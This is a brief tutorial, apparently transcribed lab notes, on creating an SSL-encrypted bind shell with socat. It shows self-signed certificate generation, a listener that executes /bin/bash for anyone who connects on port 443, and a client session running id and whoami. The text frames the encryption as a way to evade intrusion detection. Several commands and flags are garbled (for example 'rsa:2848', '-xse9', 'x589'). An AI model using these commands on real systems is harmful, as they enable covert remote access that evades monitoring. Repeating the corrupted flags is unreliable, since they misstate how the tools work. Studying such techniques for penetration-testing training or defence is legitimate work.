Socat Encrypted Bind Shells

 

Socat 

Socat is a command-line based utility that establishes two bidirectional byte streams and transfers data between them with many capabilities.

 

Socat Encrypted Bind Shells

 

To encrypt the bind shell, we use Secure socket layer certificates. This technique can be helpful in evading intrusion detection system so that we can transit our data or payload without getting detected.

let's take the example of sam want to connect to dan in an encrypted manner for this we will be using OpenSSL application to create a self-signed certificate using the following options.

req: initiate a new certificate signing request

newkey: generate a new private key

rsa:2848: use RSA encryption with a 2,048-bit key length.

-nodes: store the private key without passphrase protection

-keyout: save the key to a file

-xse9: output a self-signed certificate instead of a certificate request

-days: set validity period in days

-out: save the certificate to a file

kali@kali : ~$ openssl req -newkey rsa:2848 -nodes - keyout bind_shell.key - x589 -days 36 2 -out bind_she\t.crt
Generating a 2048 bit RSA private key
••••••••••••••••••••• +++ 
writing new private key to bind_shell.key'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a ON.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU] : US
State or Province Name (full name) [Some-State]: Georgia
Locality Name (eg, city) [] :Atlanta
Organization Name (eg, company) [Internet Widgits Pty Ltd]: D2k
Organizational Unit Name (eg, section) []: Security Department
Common Name (e.g. se rver FQDN or YOUR name) []:
Email Add ress [] :

After the key and certificate has been generated now we need to convert it to a format which socat can understand. To do so we combine both bind_shell.key and bindshell.crt files into a single .pem file.

kali @kali:~$ cat bind_shell.key bind_shell.crt > bind_shell.pem

Great now we need listeners for an incoming connection.

Let's create a listener 

kali@dan sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Breaking down the command 

OPEN-LISTEN : use to create listener

cert=bind_shell.pem to specify our certificate

verify: to disbale SSL verification 

fork: to sapwn a child process 

let's connect to dan computer using bind shell

c:\Users\sam> socat -OPENSSL:10.1.1.10:443,verify=0
id
uid=1000(kali) gid=1000(kali) groups=1000(kali)
whoami
kali

Breaking down the command

- : to transfer the data between STDIO

OPENSSL: to establish remote connection

verifyid=0: to disbale SSL certification

Bravo our encrypted bindshell has been created. Thank you for connecting.